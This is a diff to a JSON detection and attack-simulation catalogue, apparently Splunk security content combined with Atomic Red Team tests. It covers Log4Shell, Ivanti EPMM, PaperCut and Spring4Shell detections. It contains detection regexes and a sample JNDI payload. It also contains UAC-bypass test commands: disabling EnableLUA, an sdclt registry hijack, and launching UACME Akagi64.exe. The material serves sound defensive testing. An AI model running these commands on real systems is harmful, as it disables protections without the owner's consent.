"Hostname", "role": [ "Victim" @@ -130924,150 +131325,31 @@ } }, { - "name": "Log4Shell JNDI Payload Injection Attempt", - "description": "CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", - "search": "| from datamodel Web.Web | regex _raw=\"[jJnNdDiI]{4}(\\:|\\%3A|\\/|\\%2F)\\w+(\\:\\/\\/|\\%3A\\%2F\\%2F)(\\$\\{.*?\\}(\\.)?)?\" | fillnull | stats count by action, category, dest, dest_port, http_content_type, http_method, http_referrer, http_user_agent, site, src, url, url_domain, user | `log4shell_jndi_payload_injection_attempt_filter`", - "tags": { - "name": "Log4Shell JNDI Payload Injection Attempt", - "analytic_story": [ - "Log4Shell CVE-2021-44228", - "CISA AA22-257A", - "CISA AA22-320A" - ], - "asset_type": "Endpoint", - "cis20": [ - "CIS 10" - ], - "kill_chain_phases": [ - "Delivery", - "Installation" - ], - "message": "CVE-2021-44228 Log4Shell triggered for host $dest$", - "mitre_attack_id": [ - "T1190", - "T1133" - ], - "nist": [ - "DE.AE" - ], - "observable": [ - { - "name": "user", - "type": "User", - "role": [ - "Victim" - ] - }, - { - "name": "dest", - "type": "Hostname", - "role": [ - "Victim" - ] - } - ], - "risk_score": 15, - "security_domain": "threat", - "risk_severity": "low", - "mitre_attack_enrichments": [ - { - "mitre_attack_id": "T1190", - "mitre_attack_technique": "Exploit Public-Facing Application", - "mitre_attack_tactics": [ - "Initial Access" - ], - "mitre_attack_groups": [ - "APT28", - "APT29", - "APT39", - "APT41", - "Axiom", - "BackdoorDiplomacy", - "BlackTech", - "Blue Mockingbird", - "Dragonfly", - "Earth Lusca", - "Fox Kitten", - "GALLIUM", - "GOLD SOUTHFIELD", - "HAFNIUM", - "Ke3chang", - "Kimsuky", - "Magic Hound", - "Moses Staff", - "MuddyWater", - "Rocke", - "Threat Group-3390", - "Volatile Cedar", - "menuPass" - ] - }, - { - "mitre_attack_id": "T1133", - "mitre_attack_technique": "External Remote Services", - "mitre_attack_tactics": [ - "Initial Access", - "Persistence" - ], - "mitre_attack_groups": [ - "APT18", - "APT28", - "APT29", - "APT41", - "Chimera", - "Dragonfly", - "FIN5", - "GALLIUM", - "GOLD SOUTHFIELD", - "Ke3chang", - "Kimsuky", - "LAPSUS$", - "Leviathan", - "OilRig", - "Sandworm Team", - "TEMP.Veles", - "TeamTNT", - "Threat Group-3390", - "Wizard Spider" - ] - } - ] - } - }, - { - "name": "Log4Shell JNDI Payload Injection with Outbound Connection", - "description": "CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we match the invocation function with a network connection to a malicious ip address.", - "search": "| from datamodel Web.Web | rex field=_raw max_match=0 \"[jJnNdDiI]{4}(\\:|\\%3A|\\/|\\%2F)(?\\w+)(\\:\\/\\/|\\%3A\\%2F\\%2F)(\\$\\{.*?\\}(\\.)?)?(?[a-zA-Z0-9\\.\\-\\_\\$]+)\" | join affected_host type=inner [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Network_Traffic.All_Traffic by All_Traffic.dest | `drop_dm_object_name(All_Traffic)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename dest AS affected_host] | fillnull | stats count by action, category, dest, dest_port, http_content_type, http_method, http_referrer, http_user_agent, site, src, url, url_domain, user | `log4shell_jndi_payload_injection_with_outbound_connection_filter`", + "name": "Ivanti EPMM Remote Unauthenticated API Access CVE-2023-35078", + "description": "The given analytic is designed to detect the exploitation of CVE-2023-35078, a vulnerability in Ivanti Endpoint Manager Mobile (EPMM) affecting versions up to 11.4. Specifically, the query searches web logs for HTTP requests to the potentially vulnerable endpoint \"/mifs/aad/api/v2/authorized/users?*\" with a successful status code of 200. This analytic is instrumental in detecting unauthorized remote access to restricted functionalities or resources within the application, a behavior worth identifying for a Security Operations Center (SOC). By monitoring specific patterns and successful access indicators, it reveals an active attempt to exploit the vulnerability, potentially leading to data theft, unauthorized modifications, or further system compromise. If successfully executed, the impact can be severe, necessitating immediate action.", + "search": "| tstats count min(_time) as firstTime max(_time) as lastTime from datamodel=Web where Web.url IN (\"/mifs/aad/api/v2/authorized/users?*\") Web.status=200 by Web.http_user_agent, Web.status Web.http_method, Web.url, Web.url_length, Web.src, Web.dest, sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ivanti_epmm_remote_unauthenticated_api_access_cve_2023_35078_filter`", "tags": { - "name": "Log4Shell JNDI Payload Injection with Outbound Connection", + "name": "Ivanti EPMM Remote Unauthenticated API Access CVE-2023-35078", "analytic_story": [ - "Log4Shell CVE-2021-44228", - "CISA AA22-320A" + "Ivanti EPMM Remote Unauthenticated Access" ], - "asset_type": "Endpoint", + "asset_type": "Web Server", "cis20": [ - "CIS 10" + "CIS 13" ], "kill_chain_phases": [ "Delivery", "Installation" ], - "message": "CVE-2021-44228 Log4Shell triggered for host $dest$", + "message": "Potential CVE-2023-35078 against an Ivanti EPMM appliance on $dest$.", "mitre_attack_id": [ "T1190", "T1133" ], "nist": [ - "DE.AE" + "DE.CM" ], "observable": [ - { - "name": "user", - "type": "User", - "role": [ - "Victim" - ] - }, { "name": "dest", "type": "Hostname", @@ -131076,9 +131358,10 @@ ] } ], - "risk_score": 15, - "security_domain": "threat", - "risk_severity": "low", + "risk_score": 64, + "security_domain": "network", + "risk_severity": "medium", + "atomic_guid": [], "mitre_attack_enrichments": [ { "mitre_attack_id": "T1190", @@ -131145,13 +131428,13 @@ } }, { - "name": "PaperCut NG Remote Web Access Attempt", - "description": "The following analytic is designed to detect potential exploitation attempts on publicly accessible PaperCut NG servers. It identifies connections from public IP addresses to the server and specifically monitors for URI paths commonly found in proof-of-concept (POC) scripts for exploiting PaperCut NG vulnerabilities. These URI paths have been observed in both Metasploit modules and standalone scripts used for attacking PaperCut NG servers. When a public IP address is detected accessing one or more of these suspicious URI paths, an alert may be generated to notify the security team of the potential threat. The team can then investigate the source IP address, the targeted PaperCut NG server, and any other relevant information to determine the nature of the activity and take appropriate actions to mitigate the risk.", - "search": "| tstats count from datamodel=Web where Web.url IN (\"/app?service=page/SetupCompleted\", \"/app\", \"/app?service=page/PrinterList\", \"/app?service=direct/1/PrinterList/selectPrinter&sp=*\", \"/app?service=direct/1/PrinterDetails/printerOptionsTab.tab\") NOT (src IN (\"10.*.*.*\",\"172.16.*.*\", \"192.168.*.*\", \"169.254.*.*\", \"127.*.*.*\", \"fc00::*\", \"fd00::*\", \"fe80::*\")) by Web.http_user_agent Web.http_method, Web.url,Web.url_length Web.src, Web.dest Web.dest_port sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `papercut_ng_remote_web_access_attempt_filter`", + "name": "Ivanti EPMM Remote Unauthenticated API Access CVE-2023-35082", + "description": "The following analytic detects potential unauthorized access attempts exploiting CVE-2023-35082 within Ivantis software products. Initially assessed to affect only MobileIron Core versions up to 11.2, further insights revealed its influence extending to Ivanti Endpoint Manager Mobile (EPMM) versions 11.10, 11.9, 11.8, and MobileIron Core 11.7 and below. The vulnerability facilitates unauthorized API access via the specific URI path /mifs/asfV3/api/v2/. The analytic identifies this behavior by monitoring web access logs for this URI pattern coupled with a HTTP 200 response code, signifying successful unauthorized access. \\ Such behavior is imperative for a Security Operations Center (SOC) to recognize, as it highlights potential security breaches which, if not addressed, could lead to unauthorized data access, system modifications, or further exploitation. In the event of a true positive, the implications are severe: an attacker might have gained unbridled access to sensitive organizational data or could modify systems maliciously. Be vigilant of potential false positives; benign activities might occasionally match the pattern. During triage, closely scrutinize the source of the access request and its subsequent actions. This analytic aids analysts in early threat detection, allowing for proactive risk mitigation.", + "search": "| tstats count min(_time) as firstTime max(_time) as lastTime from datamodel=Web where Web.url IN (\"/mifs/asfV3/api/v2/*\") Web.status=200 by Web.http_user_agent, Web.status Web.http_method, Web.url, Web.url_length, Web.src, Web.dest, sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `ivanti_epmm_remote_unauthenticated_api_access_cve_2023_35082_filter`", "tags": { - "name": "PaperCut NG Remote Web Access Attempt", + "name": "Ivanti EPMM Remote Unauthenticated API Access CVE-2023-35082", "analytic_story": [ - "PaperCut MF NG Vulnerability" + "Ivanti EPMM Remote Unauthenticated Access" ], "asset_type": "Web Server", "cis20": [ @@ -131161,7 +131444,7 @@ "Delivery", "Installation" ], - "message": "URIs specific to PaperCut NG have been access by a public IP against $dest$.", + "message": "Potential CVE-2023-35082 against an Ivanti EPMM appliance on $dest$.", "mitre_attack_id": [ "T1190", "T1133" @@ -131178,7 +131461,331 @@ ] } ], - "risk_score": 63, + "risk_score": 64, + "security_domain": "network", + "risk_severity": "medium", + "atomic_guid": [], + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1190", + "mitre_attack_technique": "Exploit Public-Facing Application", + "mitre_attack_tactics": [ + "Initial Access" + ], + "mitre_attack_groups": [ + "APT28", + "APT29", + "APT39", + "APT41", + "Axiom", + "BackdoorDiplomacy", + "BlackTech", + "Blue Mockingbird", + "Dragonfly", + "Earth Lusca", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "HAFNIUM", + "Ke3chang", + "Kimsuky", + "Magic Hound", + "Moses Staff", + "MuddyWater", + "Rocke", + "Threat Group-3390", + "Volatile Cedar", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1133", + "mitre_attack_technique": "External Remote Services", + "mitre_attack_tactics": [ + "Initial Access", + "Persistence" + ], + "mitre_attack_groups": [ + "APT18", + "APT28", + "APT29", + "APT41", + "Chimera", + "Dragonfly", + "FIN5", + "GALLIUM", + "GOLD SOUTHFIELD", + "Ke3chang", + "Kimsuky", + "LAPSUS$", + "Leviathan", + "OilRig", + "Sandworm Team", + "TEMP.Veles", + "TeamTNT", + "Threat Group-3390", + "Wizard Spider" + ] + } + ] + } + }, + { + "name": "Log4Shell JNDI Payload Injection Attempt", + "description": "CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", + "search": "| from datamodel Web.Web | regex _raw=\"[jJnNdDiI]{4}(\\:|\\%3A|\\/|\\%2F)\\w+(\\:\\/\\/|\\%3A\\%2F\\%2F)(\\$\\{.*?\\}(\\.)?)?\" | fillnull | stats count by action, category, dest, dest_port, http_content_type, http_method, http_referrer, http_user_agent, site, src, url, url_domain, user | `log4shell_jndi_payload_injection_attempt_filter`", + "tags": { + "name": "Log4Shell JNDI Payload Injection Attempt", + "analytic_story": [ + "Log4Shell CVE-2021-44228", + "CISA AA22-257A", + "CISA AA22-320A" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Delivery", + "Installation" + ], + "message": "CVE-2021-44228 Log4Shell triggered for host $dest$", + "mitre_attack_id": [ + "T1190", + "T1133" + ], + "nist": [ + "DE.AE" + ], + "observable": [ + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + } + ], + "risk_score": 15, + "security_domain": "threat", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1190", + "mitre_attack_technique": "Exploit Public-Facing Application", + "mitre_attack_tactics": [ + "Initial Access" + ], + "mitre_attack_groups": [ + "APT28", + "APT29", + "APT39", + "APT41", + "Axiom", + "BackdoorDiplomacy", + "BlackTech", + "Blue Mockingbird", + "Dragonfly", + "Earth Lusca", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "HAFNIUM", + "Ke3chang", + "Kimsuky", + "Magic Hound", + "Moses Staff", + "MuddyWater", + "Rocke", + "Threat Group-3390", + "Volatile Cedar", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1133", + "mitre_attack_technique": "External Remote Services", + "mitre_attack_tactics": [ + "Initial Access", + "Persistence" + ], + "mitre_attack_groups": [ + "APT18", + "APT28", + "APT29", + "APT41", + "Chimera", + "Dragonfly", + "FIN5", + "GALLIUM", + "GOLD SOUTHFIELD", + "Ke3chang", + "Kimsuky", + "LAPSUS$", + "Leviathan", + "OilRig", + "Sandworm Team", + "TEMP.Veles", + "TeamTNT", + "Threat Group-3390", + "Wizard Spider" + ] + } + ] + } + }, + { + "name": "Log4Shell JNDI Payload Injection with Outbound Connection", + "description": "CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we match the invocation function with a network connection to a malicious ip address.", + "search": "| from datamodel Web.Web | rex field=_raw max_match=0 \"[jJnNdDiI]{4}(\\:|\\%3A|\\/|\\%2F)(?\\w+)(\\:\\/\\/|\\%3A\\%2F\\%2F)(\\$\\{.*?\\}(\\.)?)?(?[a-zA-Z0-9\\.\\-\\_\\$]+)\" | join affected_host type=inner [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Network_Traffic.All_Traffic by All_Traffic.dest | `drop_dm_object_name(All_Traffic)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename dest AS affected_host] | fillnull | stats count by action, category, dest, dest_port, http_content_type, http_method, http_referrer, http_user_agent, site, src, url, url_domain, user | `log4shell_jndi_payload_injection_with_outbound_connection_filter`", + "tags": { + "name": "Log4Shell JNDI Payload Injection with Outbound Connection", + "analytic_story": [ + "Log4Shell CVE-2021-44228", + "CISA AA22-320A" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Delivery", + "Installation" + ], + "message": "CVE-2021-44228 Log4Shell triggered for host $dest$", + "mitre_attack_id": [ + "T1190", + "T1133" + ], + "nist": [ + "DE.AE" + ], + "observable": [ + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + } + ], + "risk_score": 15, + "security_domain": "threat", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1190", + "mitre_attack_technique": "Exploit Public-Facing Application", + "mitre_attack_tactics": [ + "Initial Access" + ], + "mitre_attack_groups": [ + "APT28", + "APT29", + "APT39", + "APT41", + "Axiom", + "BackdoorDiplomacy", + "BlackTech", + "Blue Mockingbird", + "Dragonfly", + "Earth Lusca", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "HAFNIUM", + "Ke3chang", + "Kimsuky", + "Magic Hound", + "Moses Staff", + "MuddyWater", + "Rocke", + "Threat Group-3390", + "Volatile Cedar", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1133", + "mitre_attack_technique": "External Remote Services", + "mitre_attack_tactics": [ + "Initial Access", + "Persistence" + ], + "mitre_attack_groups": [ + "APT18", + "APT28", + "APT29", + "APT41", + "Chimera", + "Dragonfly", + "FIN5", + "GALLIUM", + "GOLD SOUTHFIELD", + "Ke3chang", + "Kimsuky", + "LAPSUS$", + "Leviathan", + "OilRig", + "Sandworm Team", + "TEMP.Veles", + "TeamTNT", + "Threat Group-3390", + "Wizard Spider" + ] + } + ] + } + }, + { + "name": "PaperCut NG Remote Web Access Attempt", + "description": "The following analytic is designed to detect potential exploitation attempts on publicly accessible PaperCut NG servers. It identifies connections from public IP addresses to the server and specifically monitors for URI paths commonly found in proof-of-concept (POC) scripts for exploiting PaperCut NG vulnerabilities. These URI paths have been observed in both Metasploit modules and standalone scripts used for attacking PaperCut NG servers. When a public IP address is detected accessing one or more of these suspicious URI paths, an alert may be generated to notify the security team of the potential threat. The team can then investigate the source IP address, the targeted PaperCut NG server, and any other relevant information to determine the nature of the activity and take appropriate actions to mitigate the risk.", + "search": "| tstats count from datamodel=Web where Web.url IN (\"/app?service=page/SetupCompleted\", \"/app\", \"/app?service=page/PrinterList\", \"/app?service=direct/1/PrinterList/selectPrinter&sp=*\", \"/app?service=direct/1/PrinterDetails/printerOptionsTab.tab\") NOT (src IN (\"10.*.*.*\",\"172.16.*.*\", \"192.168.*.*\", \"169.254.*.*\", \"127.*.*.*\", \"fc00::*\", \"fd00::*\", \"fe80::*\")) by Web.http_user_agent Web.http_method, Web.url,Web.url_length Web.src, Web.dest Web.dest_port sourcetype | `drop_dm_object_name(\"Web\")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `papercut_ng_remote_web_access_attempt_filter`", + "tags": { + "name": "PaperCut NG Remote Web Access Attempt", + "analytic_story": [ + "PaperCut MF NG Vulnerability" + ], + "asset_type": "Web Server", + "cis20": [ + "CIS 13" + ], + "kill_chain_phases": [ + "Delivery", + "Installation" + ], + "message": "URIs specific to PaperCut NG have been access by a public IP against $dest$.", + "mitre_attack_id": [ + "T1190", + "T1133" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + } + ], + "risk_score": 63, "security_domain": "network", "risk_severity": "medium", "atomic_guid": [], @@ -132122,7 +132729,7 @@ { "name": "Web Spring4Shell HTTP Request Class Module", "description": "The following analytic identifies the payload related to Spring4Shell, CVE-2022-22965. This analytic uses Splunk Stream HTTP to view the http request body, form data. STRT reviewed all the current proof of concept code and determined the commonality with the payloads being passed used the same fields \"class.module.classLoader.resources.context.parent.pipeline.first\".", - "search": "`stream_http` http_method IN (\"POST\") | stats values(form_data) as http_request_body min(_time) as firstTime max(_time) as lastTime count by http_method http_user_agent uri_path url bytes_in bytes_out | search http_request_body IN (\"*class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_*\", \"*class.module.classLoader.resources.context.parent.pipeline.first.pattern*\",\"*suffix=.jsp*\") | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `web_spring4shell_http_request_class_module_filter`", + "search": "`stream_http` http_method IN (\"POST\") | stats values(form_data) as http_request_body min(_time) as firstTime max(_time) as lastTime count by src dest http_method http_user_agent uri_path url bytes_in bytes_out | search http_request_body IN (\"*class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_*\", \"*class.module.classLoader.resources.context.parent.pipeline.first.pattern*\",\"*suffix=.jsp*\") | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `web_spring4shell_http_request_class_module_filter`", "tags": { "name": "Web Spring4Shell HTTP Request Class Module", "analytic_story": [ @@ -133265,7 +133872,7 @@ "dependencies": [ { "description": "Sqlite3 must exist at (#{sqlite3_path})\n", - "prereq_command": "if (Test-Path #{sqlite3_path}) {exit 0} else {exit 1}\n", + "prereq_command": "if (Test-Path \"#{sqlite3_path}\") {exit 0} else {exit 1}\n", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\sqlite.zip\"\nExpand-Archive -path \"PathToAtomicsFolder\\..\\ExternalPayloads\\sqlite.zip\" -destinationpath \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -force\n" } ], @@ -133304,7 +133911,7 @@ "dependencies": [ { "description": "Sqlite3 must exist at (#{sqlite3_path})\n", - "prereq_command": "if (Test-Path #{sqlite3_path}) {exit 0} else {exit 1}\n", + "prereq_command": "if (Test-Path \"#{sqlite3_path}\") {exit 0} else {exit 1}\n", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://www.sqlite.org/2022/sqlite-tools-win32-x86-3380200.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\sqlite.zip\"\nExpand-Archive -path \"PathToAtomicsFolder\\..\\ExternalPayloads\\sqlite.zip\" -destinationpath \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -force\n" } ], @@ -136184,7 +136791,7 @@ "mkdir \"\\\\?\\C:\\Windows \\System32\\\"\ncopy \"C:\\Windows\\System32\\cmd.exe\" \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\nmklink c:\\testbypass.exe \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\n", "New-Item -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Value 'cmd.exe /c notepad.exe'\nNew-ItemProperty -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Name \"DelegateExecute\"\nStart-Process -FilePath $env:windir\\system32\\sdclt.exe\nStart-Sleep -s 3\n", "reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f\n", - "\\T1548.002\\src\\T1548.002.bat\n", + "\"\\T1548.002\\src\\T1548.002.bat\"\n", "\"\\..\\ExternalPayloads\\uacme\\23 Akagi64.exe\"\n", "\"\\..\\ExternalPayloads\\uacme\\31 Akagi64.exe\"\n", "\"\\..\\ExternalPayloads\\uacme\\33 Akagi64.exe\"\n", @@ -136385,7 +136992,7 @@ } }, "executor": { - "command": "#{file_path}\n", + "command": "\"#{file_path}\"\n", "name": "command_prompt", "elevation_required": false } @@ -136407,9 +137014,9 @@ "dependency_executor_name": "powershell", "dependencies": [ { - "description": "UACME executable must exist on disk at specified location (#{uacme_exe})\n", + "description": "UACME executable must exist on disk at specified location (\"#{uacme_exe}\")\n", "prereq_command": "$tempPath = cmd /c echo #{uacme_exe}\nif (Test-Path \"$tempPath\") {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nNew-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\"\nExpand-Archive PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip PathToAtomicsFolder\\..\\ExternalPayloads\\uacme -Force\nRemove-Item PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip -Force\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nNew-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\"\nExpand-Archive \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme\" -Force\nRemove-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\" -Force\n" } ], "executor": { @@ -136435,9 +137042,9 @@ "dependency_executor_name": "powershell", "dependencies": [ { - "description": "UACME executable must exist on disk at specified location (#{uacme_exe})\n", + "description": "UACME executable must exist on disk at specified location (\"#{uacme_exe}\")\n", "prereq_command": "$tempPath = cmd /c echo #{uacme_exe}\nif (Test-Path \"$tempPath\") {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\"\nExpand-Archive PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip PathToAtomicsFolder\\..\\ExternalPayloads\\uacme -Force\nRemove-Item PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip -Force\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\"\nExpand-Archive \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme\" -Force\nRemove-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\" -Force\n" } ], "executor": { @@ -136463,9 +137070,9 @@ "dependency_executor_name": "powershell", "dependencies": [ { - "description": "UACME executable must exist on disk at specified location (#{uacme_exe})\n", + "description": "UACME executable must exist on disk at specified location (\"#{uacme_exe}\")\n", "prereq_command": "$tempPath = cmd /c echo #{uacme_exe}\nif (Test-Path \"$tempPath\") {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\"\nExpand-Archive PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip PathToAtomicsFolder\\..\\ExternalPayloads\\uacme -Force\nRemove-Item PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip -Force\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\"\nExpand-Archive \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme\" -Force\nRemove-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\" -Force\n" } ], "executor": { @@ -136491,9 +137098,9 @@ "dependency_executor_name": "powershell", "dependencies": [ { - "description": "UACME executable must exist on disk at specified location (#{uacme_exe})\n", + "description": "UACME executable must exist on disk at specified location (\"#{uacme_exe}\")\n", "prereq_command": "$tempPath = cmd /c echo #{uacme_exe}\nif (Test-Path \"$tempPath\") {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\"\nExpand-Archive PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip PathToAtomicsFolder\\..\\ExternalPayloads\\uacme -Force\nRemove-Item PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip -Force\n" + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\"\nExpand-Archive \"PathToAtomicsFolder\\..\\ExternalPayloads\\uacme.zip\" 